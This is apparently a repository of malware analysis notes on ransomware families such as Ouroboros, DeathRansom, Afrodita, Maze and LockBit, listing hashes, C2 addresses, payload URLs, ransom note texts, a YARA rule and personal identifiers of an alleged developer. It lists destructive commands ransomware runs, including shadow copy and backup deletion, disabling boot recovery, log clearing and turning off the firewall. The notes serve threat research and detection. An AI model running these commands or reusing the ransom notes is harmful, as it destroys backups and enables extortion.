├── .gitignore ├── .DS_Store ├── Stealer-Windows-Krown ├── .DS_Store └── README.md ├── Ransomware ├── _ransom_cmd.md ├── _ransomware.yara ├── Ouroboros.md ├── DeathRansom.md ├── Afrodita.md ├── Maze.md ├── Clop.md ├── Snake.md ├── Mamo434376.md ├── Antefrigus.md ├── Nemty.md ├── PureLocker.md ├── Lockbit.md ├── Robbinhood.md ├── Snatch.md └── _ransom_notes.md ├── Ransomware-Windows-LockBit-v3 └── README.md ├── Ransomware-Windows-DarkBit └── README.md ├── Ransomware-Windows-Yanluowang └── README.md └── Ransomware-Linux-Lockbit └── README.md /.gitignore: -------------------------------------------------------------------------------- 1 | 2 | .DS_Store 3 | -------------------------------------------------------------------------------- /.DS_Store: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/albertzsigovits/malware-notes/HEAD/.DS_Store -------------------------------------------------------------------------------- /Stealer-Windows-Krown/.DS_Store: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/albertzsigovits/malware-notes/HEAD/Stealer-Windows-Krown/.DS_Store -------------------------------------------------------------------------------- /Ransomware/_ransom_cmd.md: -------------------------------------------------------------------------------- 1 | ## Ransom commands 2 | Most common OS commands executed by ransomware 3 | 4 | ## Bcdedit 5 | - bcdedit /set {default} bootstatuspolicy ignoreallfailures 6 | - bcdedit /set {default} recoveryenabled no 7 | - bcdedit /set {current} safeboot minimal 8 | 9 | ## Fsutil 10 | - fsutil usn deletejournal 11 | - fsutil file setZeroData offset= 12 | 13 | ## Netsh 14 | - netsh advfirewall set currentprofile state off 15 | - netsh firewall set opmode disable 16 | - netsh firewall set opmode mode=disable 17 | 18 | ## Shutdown 19 | - shutdown.exe /r /f /t 00 20 | 21 | ## Vssadmin 22 | - vssadmin delete shadows /all /quiet 23 | - vssadmin resize shadowstorage /for=C: /on=C: /maxsize=401MB 24 | - vssadmin resize shadowstorage /for=C: /on=C: /maxsize=unbounded 25 | 26 | ## Wbadmin 27 | - wbadmin delete backup 28 | - wbadmin delete catalog -quiet 29 | - wbadmin delete systemstatebackup 30 | - wbadmin delete systemstatebackup -deleteOldest 31 | - wbadmin delete systemstatebackup -keepversions:0 32 | 33 | ## Wevtutil 34 | - wevtutil cl system 35 | - wevtutil cl security 36 | - wevtutil cl application 37 | 38 | ## Wmic 39 | - wmic shadowcopy /nointeractive 40 | - wmic shadowcopy delete 41 | -------------------------------------------------------------------------------- /Ransomware/_ransomware.yara: -------------------------------------------------------------------------------- 1 | rule detect_ransomware_test35 2 | { 3 | strings: 4 | $ransom0 = "PhysicalDrive" ascii wide 5 | $ransom1 = "attrib" ascii wide 6 | $ransom2 = "runas" ascii wide 7 | $ransom3 = "net" ascii wide 8 | $ransom4 = "stop" ascii wide 9 | $ransom5 = "sc" ascii wide 10 | $ransom6 = "config" ascii wide 11 | $ransom7 = "wevtutil" ascii wide 12 | $ransom8 = "taskkill" ascii wide 13 | $ransom9 = "vssadmin" ascii wide 14 | $ransom10 = "quiet" ascii wide 15 | $ransom11 = "diskshadow" ascii wide 16 | $ransom12 = "shadows" ascii wide 17 | $ransom13 = "all" ascii wide 18 | $ransom14 = "schtasks" ascii wide 19 | $ransom15 = "create" ascii wide 20 | $ransom16 = "system" ascii wide 21 | $ransom17 = "wmic" ascii wide 22 | $ransom18 = "powershell" ascii wide 23 | $ransom19 = "cmd" ascii wide 24 | $ransom20 = "bcdedit" ascii wide 25 | $ransom21 = "set" ascii wide 26 | $ransom22 = "fsutil" ascii wide 27 | $ransom23 = "deletejournal" ascii wide 28 | $ransom24 = "usn" ascii wide 29 | $ransom25 = "recoveryenabled" ascii wide 30 | $ransom26 = "bootstatuspolicy" ascii wide 31 | $ransom27 = "ignoreallfailures" ascii wide 32 | $ransom28 = "wmic" ascii wide 33 | $ransom29 = "shadowcopy" ascii wide 34 | $ransom30 = "delete" ascii wide 35 | $ransom31 = "powershell" ascii wide 36 | $ransom32 = "win32_shadowcopy" ascii wide 37 | $ransom33 = "vssadmin" ascii wide 38 | $ransom34 = "resize" ascii wide 39 | $ransom35 = "shadowstorage" ascii wide 40 | $ransom36 = "process" ascii wide 41 | $ransom37 = "call" ascii wide 42 | $ransom38 = "create" ascii wide 43 | $ransom39 = "wbadmin" ascii wide 44 | $ransom40 = "catalog" ascii wide 45 | $ransom41 = "quiet" ascii wide 46 | $ransom42 = "systemstatebackup" ascii wide 47 | $ransom43 = "backup" ascii wide 48 | $ransom44 = "ransom" ascii wide 49 | $ransom45 = "files" ascii wide 50 | $ransom46 = "encrypt" ascii wide 51 | $ransom47 = "RSA" ascii wide 52 | $ransom48 = "AES" ascii wide 53 | $ransom49 = "key" ascii wide 54 | $ransom50 = "wallet" ascii wide 55 | $ransom51 = "decrypt" ascii wide 56 | $ransom52 = "recover" ascii wide 57 | $ransom53 = "payment" ascii wide 58 | 59 | condition: 60 | uint16(0) == 0x5a4d and filesize < 1MB and 35 of them 61 | } -------------------------------------------------------------------------------- /Ransomware/Ouroboros.md: -------------------------------------------------------------------------------- 1 | # Ouroboros v7 ransomware 2 | 3 | ## References 4 | - https://app.any.run/tasks/d8f2f343-cc63-40ca-8571-2d5c8d139f16 5 | 6 | ## Ransom e-mail 7 | - Honeylock@protonmail.com 8 | 9 | ## Ransom extension 10 | - .odveta 11 | 12 | ## Renamed files format 13 | - .Email=[...]ID=[...] 14 | 15 | ## PDB 16 | - C:\Users\LEGION\Desktop\New folder\sha_simd.cpp 17 | - C:\Users\LEGION\Desktop\New folder\gcm_simd.cpp 18 | - C:\Users\LEGION\Desktop\New folder\sse_simd.cpp 19 | - D:\Ouroboros v7\Ouroborosv7\Release\Ouroborosv7.pdb 20 | 21 | ## C2 check-in 22 | ``` 23 | sfml-dev.org/ip-provider.php 24 | User-Agent: libsfml-network/2.x 25 | ``` 26 | 27 | ## C2 server 28 | ``` 29 | 80.82.69.52 - WIN-CMHPELDRE6E 30 | ``` 31 | 32 | ## Uri parameters 33 | - &mail= 34 | - &id= 35 | - &key= 36 | - &disk= 37 | - &ip= 38 | 39 | ## Commands executed 40 | - bcdedit /set {default} bootstatuspolicy ignoreallfailures 41 | - bcdedit /set {default} recoveryenabled no 42 | - netsh advfirewall set currentprofile state off 43 | - netsh firewall set opmode mode=disable 44 | - vssadmin delete shadows /all 45 | - wbadmin delete catalog -quiet 46 | 47 | ## Dropped files 48 | - C:\ProgramData\id.txt 49 | - C:\ProgramData\ids.txt 50 | - C:\ProgramData\Pkey.txt 51 | - C:\ProgramData\info.txt 52 | - C:\ProgramData\uiapp.exe 53 | 54 | ## Extension list 55 | ``` 56 | .exe 57 | .mdf 58 | .pst 59 | .bak 60 | .tib 61 | .DBF 62 | .zip 63 | ``` 64 | 65 | ## Process killlist 66 | ``` 67 | sqlserver.exe 68 | msftesql.exe 69 | sqlagent.exe 70 | sqlbrowser.exe 71 | sqlwriter.exe 72 | mysqld.exe 73 | mysqld-nt.exe 74 | mysqld-opt.exe 75 | ``` 76 | 77 | ## Service stoplist 78 | ``` 79 | net stop SQLWriter 80 | net stop SQLBrowser 81 | net stop MSSQLSERVER 82 | net stop MSSQL$CONTOSO1 83 | net stop MSDTC 84 | net stop SQLSERVERAGENT 85 | net stop vds 86 | ``` 87 | 88 | ## RSA key 89 | ``` 90 | MIIBIDANBgkqhkiG9w0BAQEFAAOCAQ0AMIIBCAKCAQEAzA+0svdK/zcghzPRS7F+pPzCjAlygcNhQj/T5g7HigLegVH/Fi2dhjBDxjt9Ly3aPsHpTb32ub2xb3gvv2VcBi4P 91 | VOClceG9Pq6M6HlUGYt1yhSRx8v+0CHX9Dg9rA/3SMhlqsVodtHtMbefPnPhto1/QY4FCcS3xGcC97Ja+oDkCVnkES8U1xeHno5kIlIWMulS5pjM6D3hss5yjUjIHiSr06QS 92 | 4gCLX1ZijMo0wA3y6k9RUm9Me8MYiss/39RzsgGwDv5+DNxkLgSU25Sa2NZ8iG+Vufk/CkWe9CQj/SRCHm/mVQpNlfbthTTGh3OXy36pu46nYv3fS/ulkqHTaQIBEQ== 93 | ``` 94 | 95 | ## Ransom note: 96 | ``` 97 | in Case of no answer contact : Honeylock@cock.li 98 | You Can Learn How to Buy Bitcoin From This links Below 99 | https://localbitcoins.com/buy_bitcoins 100 | https://www.coindesk.com/information/how-can-i-buy-bitcoins 101 | Your Id: 102 | ***All Your Files Has Been Encrypted*** 103 | You have To Pay To Get Decryption Tool with Key 104 | The Time That Your System infected has been logged in Our Server 105 | So Being late more Than 48hours To contact or paying us will Double The price 106 | And using 3rd party applications may damage your files and increase the Price 107 | You Can Send some Files that not Contains Valuable Data To make Sure That Your Files Can be Back with our Tool 108 | The Payment Should Be with Cryptocurrencies Like Bitcoin(BTC) Send Email to Know the Price And Do an Agreement 109 | Our Email: 110 | ``` -------------------------------------------------------------------------------- /Ransomware/DeathRansom.md: -------------------------------------------------------------------------------- 1 | # DeathRansom \ Wacatac ransomware 2 | 3 | ## SHA256 hashes 4 | - 05b762354678004f8654e6da38122e6308adf3998ee956566b8f5d313dc0e029 5 | - 0cf124b2afc3010b72abdc2ad8d4114ff1423cce74776634db4ef6aaa08af915 6 | - 13d263fb19d866bb929f45677a9dcbb683df5e1fa2e1b856fde905629366c5e1 7 | - 1e1fcb1bcc88576318c37409441fd754577b008f4678414b60a25710e10d4251 8 | - 2b9c53b965c3621f1fa20e0ee9854115747047d136529b41872a10a511603df8 9 | - 4bc383a4daff74122b149238302c5892735282fa52cac25c9185347b07a8c94c 10 | - 6247f283d916b1cf0c284f4c31ef659096536fe05b8b9d668edab1e1b9068762 11 | - 66ee3840a9722d3912b73e477d1a11fd0e5468769ba17e5e71873fd519e76def 12 | - a45a75582c4ad564b9726664318f0cccb1000005d573e594b49e95869ef25284 13 | - dc9ff5148e26023cf7b6fb69cd97d6a68f78bb111dbf39039f41ed05e16708e4 14 | - e767706429351c9e639cfecaeb4cdca526889e4001fb0c25a832aec18e6d5e06 15 | - f78a743813ab1d4eee378990f3472628ed61532e899503cc9371423307de3d8b 16 | - fedb4c3b0e080fb86796189ccc77f99b04adb105d322bddd3abfca2d5c5d43c8 17 | 18 | ## References 19 | - https://id-ransomware.blogspot.com/2019/11/wacatac-ransomware.html 20 | - https://twitter.com/search?q=deathransom&src=typed_query 21 | - https://www.fortinet.com/blog/threat-research/death-ransom-attribution.html 22 | 23 | ## IoCs and Notes 24 | ### Others 25 | - Encrypted extension: `.wctc` 26 | - Ransom note: `read_me.txt` 27 | - Check-in : `https://iplogger.org/1Zqq77` 28 | - Shadow copy deletion: `select * from Win32_ShadowCopy` via `ROOT\cimv2` 29 | 30 | ### IoCs 31 | - `iplogger[.]org/1Zqq77` 32 | - `bitbucket[.]org/scat01/1/downloads/Wacatac_2019-11-16_14-06.exe` 33 | - `bitbucket[.]org/scat01` 34 | - `scat01.mcdir[.]ru` 35 | - `scat01[.]tk` 36 | - `gameshack[.]ru/scat01.exe` 37 | 38 | ### Ransom e-mails: 39 | - `death@cumallover.me` 40 | - `death@firemail.cc` 41 | - `deathransom@airmail.cc` 42 | 43 | ### Ransom address: 44 | - `1J9CG9KtJZVx1dHsVcSu8cxMTbLsqeXM5N` 45 | 46 | ### Registry keys used for private/public key: 47 | - `HKCU\SOFTWARE\Wacatac` 48 | - `HKCU\SOFTWARE\Wacatac\private` 49 | - `HKCU\SOFTWARE\Wacatac\public` 50 | 51 | ### Excluded files/folders from encryption: 52 | - `programdata` 53 | - `$recycle.bin` 54 | - `program files` 55 | - `windows` 56 | - `all users` 57 | - `appdata` 58 | - `read_me.txt` 59 | - `autoexec.bat` 60 | - `desktop.ini` 61 | - `autorun.inf` 62 | - `ntuser.dat` 63 | - `iconcache.db` 64 | - `bootsect.bak` 65 | - `boot.ini` 66 | - `ntuser.dat.log` 67 | - `thumbs.db` 68 | 69 | ## Developer's identities: 70 | - scat01 71 | - nedugov 72 | - nedugov99 73 | - SoftEgorka 74 | - undefined_Nedugov 75 | - Phone: `+7951****311` 76 | - VKontakte: `id154704666` 77 | - E-mail: `vitasa01@yandex.ru` 78 | - Instagram: `pro_huligan_` 79 | - WebMoneyID: `372443071304` 80 | 81 | ## Ransom note: 82 | ``` 83 | ????????????????????????? 84 | ??????DEATHRansom ??????? 85 | ????????????????????????? 86 | Hello dear friend, 87 | Your files were encrypted! 88 | You have only 12 hours to decrypt it 89 | In case of no answer our team will delete your decryption password 90 | Write back to our e-mail: deathransom@airmail.cc 91 | 92 | 93 | In your message you have to write: 94 | 1. YOU LOCK-ID: %s 95 | 2. Time when you have paid 0.1 btc to this bitcoin wallet: 96 | 1J9CG9KtJZVx1dHsVcSu8cxMTbLsqeXM5N 97 | 98 | 99 | After payment our team will decrypt your files immediatly 100 | 101 | 102 | Free decryption as guarantee: 103 | 1. File must be less than 1MB 104 | 2. Only .txt or .lnk files, no databases 105 | 3. Only 1 files 106 | 107 | 108 | How to obtain bitcoin: 109 | The easiest way to buy bitcoins is LocalBitcoins site. You have to register, click 'Buy bitcoins', and select the seller by payment 110 | method and price. 111 | https://localbitcoins.com/buy_bitcoins 112 | Also you can find other places to buy Bitcoins and beginners guide here: 113 | http://www.coindesk.com/information/how-can-i-buy-bitcoins/ 114 | ``` 115 | -------------------------------------------------------------------------------- /Ransomware-Windows-LockBit-v3/README.md: -------------------------------------------------------------------------------- 1 | # LockBit v3.0 (LockBit Black) 2 | 3 | ## Hashes: 4 | - 391a97a2fe6beb675fe350eb3ca0bc3a995fda43d02a7a6046cd48f042052de5 5 | - 506f3b12853375a1fbbf85c82ddf13341cf941c5acd4a39a51d6addf145a7a51 6 | - 80e8defa5377018b093b5b90de0f2957f7062144c83a09a56bba1fe4eda932ce 7 | - c6cf5fd8f71abaf5645b8423f404183b3dea180b69080f53b9678500bab6f0de 8 | - d61af007f6c792b8fb6c677143b7d0e2533394e28c50737588e40da475c040ee 9 | 10 | ## ITW Names: 11 | - name:{04830965-76E6-6A9A-8EE1-6AF7499C1D08}.exe 12 | 13 | ## Execution: 14 | - {04830965-76E6-6A9A-8EE1-6AF7499C1D08}.exe -k LocalServiceNetworkRestricted -pass db66023ab2abcb9957fb01ed50cdfa6a 15 | 16 | ## Samples: 17 | - https://bazaar.abuse.ch/browse/tag/lockbit%20black/ 18 | - https://bazaar.abuse.ch/browse/tag/lockbit3/ 19 | 20 | ## YARA rules: 21 | - https://yaraify.abuse.ch/yarahub/rule/LockbitBlack_Loader/ 22 | - https://yaraify.abuse.ch/yarahub/rule/lockbitblack_ransomnote/ 23 | - https://yaraify.abuse.ch/search/yara/LockBit3Detect_via_SectionPatterns/ 24 | 25 | ## Tweets: 26 | - https://twitter.com/vxunderground/status/1543661557883740161 27 | - https://twitter.com/cPeterr/status/1543692271186579459 28 | - https://twitter.com/captainGeech42/status/1543682202449465344 29 | - https://twitter.com/fwosar/status/1543700719181746182 30 | - https://twitter.com/WhichbufferArda/status/1543900539280293889 31 | - https://twitter.com/gN3mes1s/status/1544248752256520193 32 | - https://twitter.com/SI_FalconTeam/status/1543997169199419394 33 | - https://twitter.com/MalGamy12/status/1544080516802121728 34 | - https://twitter.com/cluster25_io/status/1544313400561471491 35 | 36 | ## Sandboxes: 37 | - https://tria.ge/220704-dfxvbaebdj 38 | 39 | ## VT Perks: 40 | - comment:"LockBit Black" 41 | - comment:"LockBit 3.0" 42 | - metadata:0x1b46f 43 | - entry_point:111727 44 | - imphash:a50a0d82b9120fc73965c28fea79e1f9 45 | 46 | ## Strings: 47 | ```yara 48 | ---------------------------- 49 | | FLOSS STACK STRINGS (13) | 50 | ---------------------------- 51 | Default 52 | WinSta0 53 | *recycle* 54 | fJS6 55 | bootmgr 56 | .ico 57 | \Defaul 58 | Volume{ 59 | 60 | --------------------------- 61 | | FLOSS TIGHT STRINGS (3) | 62 | --------------------------- 63 | ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/* 64 | TrustedInstaller 65 | 66 | ------------------------------- 67 | | FLOSS DECODED STRINGS (102) | 68 | ------------------------------- 69 | ... 70 | LDAP://%s 71 | WinSta0\Default 72 | Program Files 73 | gPCUserExtensionNames 74 | %s_IPC$ 75 | LDAP://CN=Computers, 76 | LDAP://DC=%s,DC=%s 77 | __ProviderArchitecture 78 | ADMIN 79 | %sADMIN$\Temp\%s.exe 80 | %04d-%02d-%02d %02d:%02d:%02d 81 | hScreen 82 | distinguishedName 83 | defaultNamingContext 84 | %s.README.txt 85 | %sADMIN$\Temp 86 | \.\pipe\%s 87 | GPT.INI 88 | Control Panel\International 89 | SOFTWARE\Microsoft\Windows NT\CurrentVersion 90 | ROOT\CIMV2 91 | wall 92 | %spipe\%s 93 | Mailbox 94 | \%s.%s\ 95 | pass 96 | LDAP://rootDSE 97 | O:BAG:SYD:(A;;0x1;;;SY)(A;;0x5;;;BA)(A;;0x1;;;LA) 98 | 2621892 99 | ProductName 100 | dNSHostName 101 | Enabled 102 | LocaleName 103 | Software\Microsoft\Windows\CurrentVersion\Group Policy\Status 104 | versionNumber 105 | \%s\sysvol\%s\scripts\ 106 | LDAP://CN=Policies,CN=System,%s 107 | %TempDir% 108 | {%08lX-%04X-%04X-%02X%02X-%02X%02X%02X%02X%02X%02X} 109 | %%SystemRoot%%\Temp\%s.exe 110 | Elevation:Administrator!new:{3E5FC7F9-9A51-4367-9063-A120244FBEC7} 111 | SELECT * FROM Win32_ShadowCopy 112 | ChannelAccess 113 | [General] 114 | Version=%s 115 | displayName=%s 116 | {%08X-%04X-%04X-%02X%02X-%02X%02X%02X%02X%02X%02X} 117 | Global\%.8x%.8x%.8x%.8x 118 | dllhost.exe 119 | sLanguage 120 | %s=%s 121 | LDAP://CN=%s,CN=Policies,CN=System,DC=%s,DC=%s 122 | SOFTWARE\Microsoft\Windows\CurrentVersion\WINEVT\Channels 123 | LDAP://%s/DC=%s,DC=%s 124 | gPCMachineExtensionNames 125 | NT AUTHORITY\SYSTEM 126 | %.8x%.8x%.8x%.8x% 127 | gdel 128 | WINSPOOL 129 | displayName 130 | %%SystemRoot%%\Temp\%s.exe -k LocalServiceNetworkRestricted 131 | Win32_ShadowCopy.ID='%s' 132 | \.\pipe\{%08X-%04X-%04X-%02X%02X-%02X%02X%02X%02X%02X%02X} 133 | POST 134 | .dll 135 | office 136 | psex 137 | %%SystemRoot%%\Temp\%s.exe -k LocalServiceNetworkRestricted -pass %s 138 | EventLog 139 | Registry.pol 140 | ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789 141 | ExchangeInstallPath 142 | Consolas 143 | SYSTEM\CurrentControlSet\Services\EventLog 144 | onenote 145 | ABCDIJKLEFGHQRSTMNOPYZabUVWXghijcdefopqrklmnwxyzstuv4567012389 146 | Times New Roman 147 | comment.cmtx 148 | SOFTWARE\%s 149 | ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/ 150 | vE29 151 | ``` 152 | -------------------------------------------------------------------------------- /Ransomware/Afrodita.md: -------------------------------------------------------------------------------- 1 | # Afrodita ransomware 2 | 3 | ## SHA256 hashes 4 | 5 | ## References 6 | - https://www.vmray.com/analyses/ed58323b71a8/report/overview.html 7 | - https://app.any.run/tasks/07cbb83d-5fa5-4a5d-a39b-6aa6df03b4f2/ 8 | - https://id-ransomware.blogspot.com/2020/01/afrodita-ransomware.html 9 | - https://dissectingmalwa.re/not-so-nice-after-all-afrodita-ransomware.html 10 | 11 | ## Notes 12 | - Mostly distributed UPX packed, no other packer seen so far 13 | 14 | ## Payloads 15 | ```url 16 | riskpartner.hr/wp-content/notnice.jpg 17 | poloprint.hr/wp-content/uploads/2017/05/havefun.png 18 | content-delivery.in/verynice.jpg 19 | ``` 20 | 21 | ## Mutex 22 | - 835821AM3218SAZ 23 | 24 | ## DLL Exports 25 | - Sura 26 | - Ares 0701 27 | 28 | ## PE Resource section 29 | - IDR_RSA - RSA public key 30 | - Interesting sublang: SUBLANG_ARABIC_OMAN 31 | - Offset 0x000b1070 32 | - Size 0x00000124 33 | 34 | ## Files dropped 35 | - \AppData\Local\Temp\_uninsep.bat 36 | - client-encrypted-private.key 37 | - client-public.key 38 | - main-public.key 39 | - _README_RECOVERY_.txt 40 | 41 | ## Embedded RSA key 42 | ``` 43 | -----BEGIN RSA PUBLIC KEY----- 44 | MIIBIDANBgkqhkiG9w0BAQEFAAOCAQ0AMIIBCAKCAQEAxs2xkeHRygZBupFc2+Z//dLnMbWR/NiXQBmP 45 | 10Q7nbG/5jaDcik+eGDh2zz6XYr2Ur+sS1yD4/1XQeIZ/zjcjC43H090nUlELTtq9ED8LqevnrOaMQFy 46 | UIhQU+plY5eJd6KuW2dCdv8n0uBDAzBQRnpjJr0AmnkEzRGD5XCoYtrR061kBAerXQjBxhQSnsMWxE2R 47 | excq38tgf/szXPaoSD1vsSmIwXbc3nTkadYPfjLu6aWWYmikWIi3z+RoUOm7OhmaOu+azPCPBjHc93cB 48 | KsLnxzSHiKRFN4cd0Tu+uvehGl1+v3CK0Zj+nr5OfeNjMGYQj80t0+AqnDQkzwdA/wIBEQ== 49 | -----END RSA PUBLIC KEY----- 50 | ``` 51 | 52 | ## Ransom e-mails 53 | - afroditateam@tutanota.com 54 | - afroditasupport@firemail.cc 55 | - afroditasupport@mail2tor.com 56 | 57 | ## Telegram Support 58 | - @RecoverySupport 59 | 60 | ## ITW Filenames 61 | - Afrodita.dll 62 | - test.dll 63 | - notnice.png 64 | - havefun.png 65 | - verynice.jpg 66 | 67 | ## List of extensions to encrypt 68 | ``` 69 | .WALLET 70 | .CLASS 71 | .INCPAS 72 | .ACCDB 73 | .ACCDR 74 | .ACCDT 75 | .ACCDE 76 | .D3DBSP 77 | .BACKUPDB 78 | .BACKUP 79 | .IBANK 80 | .PKPASS 81 | .MDDATA 82 | .MDBACKUP 83 | .SYNCDB 84 | .LAYOUT 85 | .DAZIP 86 | .ARCH00 87 | .VPP_PC 88 | .MCMETA 89 | .MPQGE 90 | .LITEMOD 91 | .ASSET 92 | .FORGE 93 | .RGSS3A 94 | .WOTREPLAY 95 | .MRWREF 96 | .BLEND 97 | .DESIGN 98 | .YCBCRA 99 | .SQLITEDB 100 | .SQLITE3 101 | .SQLITE 102 | .SAS7BDAT 103 | .PSAFE3 104 | .ERBSQL 105 | .DB-JOURNAL 106 | .MONEYWELL 107 | ``` 108 | 109 | ## List of folders to avoid 110 | ``` 111 | Program Files (x86) 112 | All Users 113 | $GetCurrent 114 | AppData 115 | Program Files 116 | ProgramData 117 | Windows 118 | ``` 119 | 120 | ## uninsep.bat cleanup file 121 | ``` 122 | :Repeat 123 | del "C:\Users\admin\Desktop\notnice.jpg.exe" 124 | if exist "C:\Users\admin\Desktop\notnice.jpg.exe" goto Repeat 125 | rmdir "C:\Users\admin\Desktop" 126 | del "C:\Users\admin\AppData\Local\Temp\_uninsep.bat" 127 | ``` 128 | 129 | ## PDB 130 | ``` 131 | F:\Work\x_Projects\Afrodita - VS2019\Afrodita\cryptopp\rijndael_simd.cpp 132 | F:\Work\x_Projects\Afrodita - VS2019\Afrodita\cryptopp\sha_simd.cpp 133 | F:\Work\x_Projects\Afrodita - VS2019\Afrodita\cryptopp\sse_simd.cpp 134 | ``` 135 | 136 | ## Ransom note's filename 137 | ``` 138 | __README_RECOVERY_.txt 139 | ``` 140 | 141 | ## Ransom note 142 | ``` 143 | ~~~ Greetings ~~~ 144 | [+] What has happened? [+] 145 | Your files are encrypted, and currently unavailable. You are free to check. 146 | Every file is recoverable by following our instructions below. 147 | Encryption algorithms used: AES256(CBC) + RSA2048 (military/government grade). 148 | [+] Guarantees? [+] 149 | This is our daily job. We are not here to lie to you - as you are 1 of 10000's. 150 | Our only interest is in us getting payed and you getting your files back. 151 | If we were not able to decrypt the data, other people in same situation as you 152 | wouldn't trust us and that would be bad for our buissness -- 153 | So it's not in our interest. 154 | To prove our ability to decrypt your data you have 1 file free decryption. 155 | If you don't want to pay the fee for bringing files back that's okey, 156 | but remeber that you will lose a lot of time - and time is money. 157 | Don't waste your time and money trying to recover files using some file 158 | recovery "experts", we have your private key - only we can get the files back. 159 | With our service you can go back to original state in less then 30 minutes. 160 | [+] Service [+] 161 | If you decided to use our service please follow instructions below. 162 | Contact us: 163 | email address: afroditasupport@mail2tor.com, put in cc: afroditasupport@firemail.cc 164 | ``` 165 | -------------------------------------------------------------------------------- /Ransomware/Maze.md: -------------------------------------------------------------------------------- 1 | # Maze ransomware 2 | 3 | ## SHA256 hashes 4 | 04e22ab46a8d5dc5fea6c41ea6fdc913b793a4e33df8f0bc1868b72b180c0e6e 5 | 067f1b8f1e0b2bfe286f5169e17834e8cf7f4266b8d97f28ea78995dc81b0e7b 6 | 153defee225de889d2ac66605f391f4aeaa8b867b4093c686941e64d0d245a57 7 | 195ef8cfabc2e877ebb1a60a19850c714fb0a477592b0a8d61d88f0f96be5de9 8 | 19713e7ae529091a995effe4e7271f2c23487c594af0a39cd4335d95e0abc99d 9 | 58fe9776f33628fd965d1bcc442ec8dc5bfae0c648dcaec400f6090633484806 10 | 5c9b7224ffd2029b6ce7b82ea40d63b9d4e4f502169bc91de88b4ea577f52353 11 | 6a22220c0fe5f578da11ce22945b63d93172b75452996defdc2ff48756bde6af 12 | 7c03b49d24c948f838b737fb476d57849a1fd6b205f94214bf2a5a3b7a36f17a 13 | 806fc33650b7ec35dd01a06be3037674ae3cc0db6ba1e3f690ee9ba9403c0627 14 | 822a264191230f753546407a823c6993e1a83a83a75fa36071a874318893afb8 15 | 91514e6be3f581a77daa79e2a4905dcbdf6bdcc32ee0f713599a94d453a26fc1 16 | 9e88e833d1309fe1417628519851f74cffafa51ea8a65bbd7f0433c9d9be196a 17 | a9da834206c24147866c3281c0ba898fb0d162fd9f87453df4c1674aaed45df7 18 | c040defb9c90074b489857f328d3e0040ac0ddab26cde132f17cccae7f1309cc 19 | e8a091a84dd2ea7ee429135ff48e9f48f7787637ccb79f6c3eb42f34588bc684 20 | ebbb5ac2be538edff5560ef74b996a3fbc3589b3063074c5037da05acd6374d2 21 | fc611f9d09f645f31c4a77a27b6e6b1aec74db916d0712bef5bce052d12c971f 22 | 23 | ## References 24 | https://twitter.com/VK_Intel/status/1189431136398794752 25 | https://twitter.com/VK_Intel/status/1186346215388131333 26 | https://twitter.com/VK_Intel/status/1185255932474904576 27 | https://twitter.com/MalwareTechBlog/status/1184926173861572608 28 | http://mazenews.top 29 | 30 | ## Notes 31 | - Maze Team maintains a site: `mazenews.top` 32 | - Ransom note file: `DECRYPT-FILES.txt` 33 | - Checks AV software: `Select * From AntiVirusProduct` via `root\SecurityCenter2` 34 | - Check shadow copies: `select * from Win32_ShadowCopy` via `ROOT\cimv2` 35 | - Used User-Agent in C2 traffic: `User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; AS; rv:11.0) like Gecko` 36 | - Seen pdbs: 37 | - `C:\random\fucking\path\to\fucking\idiotic\nonexisting\file\with\pdb\extension.pdb` 38 | - `C:\vc5\Release\Zeroaccess.pdb` 39 | - `C:\shit\gavno.pdb` 40 | - `C:\demonslay335\emsisoft_work\ransomware\hutchins.pdb` 41 | - Mutex is randomly generated: `Global\c35e0a1a78e8cdbc` 42 | - Same string used as `c35e0a1a78e8cdbc.tmp` on the file system 43 | - Shadow copy deletion: wmic `"%s" shadowcopy delete` via `Win32_ShadowCopy.ID='%s'` 44 | 45 | ## VT searches 46 | - imphash:"4c3d146415a27e5b2b768097598f2851" 47 | - imphash:"a0667aaff29d40b151e423bcd42d1e15" 48 | - imphash:"e6c2e529c8b3c790ab91901a5172e552" 49 | - resource:"0cad26ce9da0bb3e380866e27c5f5ad17bb2f363352105f42b3dc1e9086c9366" 50 | - resource:"884d4eddb1c544532c4225419e319749700b5503503e707f86b1cae740bc4c18" 51 | - resource:"a4d658476e4693a873db1a349aa5ca0238c1df1708d5e67ed0f0187784d7336d" 52 | 53 | ## Yara rules 54 | ```yara 55 | rule maze_caro 56 | { 57 | condition: 58 | new_file and signatures matches /.*Ransom.*Maze.*/ 59 | } 60 | ``` 61 | ## Ransom note 62 | ``` 63 | Attention! 64 | ---------------------------- 65 | | What happened? 66 | ---------------------------- 67 | All your files, documents, photos, databases, and other important data are safely encrypted with reliable algorithms. 68 | You cannot access the files right now. But do not worry. You have a chance! It is easy to recover in a few steps. 69 | ---------------------------- 70 | | How to get my files back? 71 | ---------------------------- 72 | The only method to restore your files is to purchase a unique for you private key which is securely stored on our servers. 73 | To contact us and purchase the key you have to visit our website in a hidden TOR network. 74 | There are general 2 ways to reach us: 75 | 1) [Recommended] Using hidden TOR network. 76 | a) Download a special TOR browser: https://www.torproject.org/ 77 | b) Install the TOR Browser. 78 | c) Open the TOR Browser. 79 | d) Open our website in the TOR browser: http://aoacugmutagkwctu.onion/%USERID% 80 | e) Follow the instructions on this page. 81 | 2) If you have any problems connecting or using TOR network 82 | a) Open our website: https://mazedecrypt.top/%USERID% 83 | b) Follow the instructions on this page. 84 | Warning: the second (2) method can be blocked in some countries. That is why the first (1) method is recommended to use. 85 | On this page, you will see instructions on how to make a free decryption test and how to pay. 86 | Also it has a live chat with our operators and support team. 87 | ---------------------------- 88 | | What about guarantees? 89 | ---------------------------- 90 | We understand your stress and worry. 91 | So you have a FREE opportunity to test a service by instantly decrypting for free three files on your computer! 92 | If you have any problems our friendly support team is always here to assist you in a live chat! 93 | ------------------------------------------------------------------------------- 94 | THIS IS A SPECIAL BLOCK WITH A PERSONAL AND CONFIDENTIAL INFORMATION! DO NOT TOUCH IT WE NEED IT TO IDENTIFY AND AUTHORIZE YOU 95 | ---BEGIN MAZE KEY--- 96 | %base64key% 97 | ---END MAZE KEY--- 98 | ``` 99 | -------------------------------------------------------------------------------- /Ransomware/Clop.md: 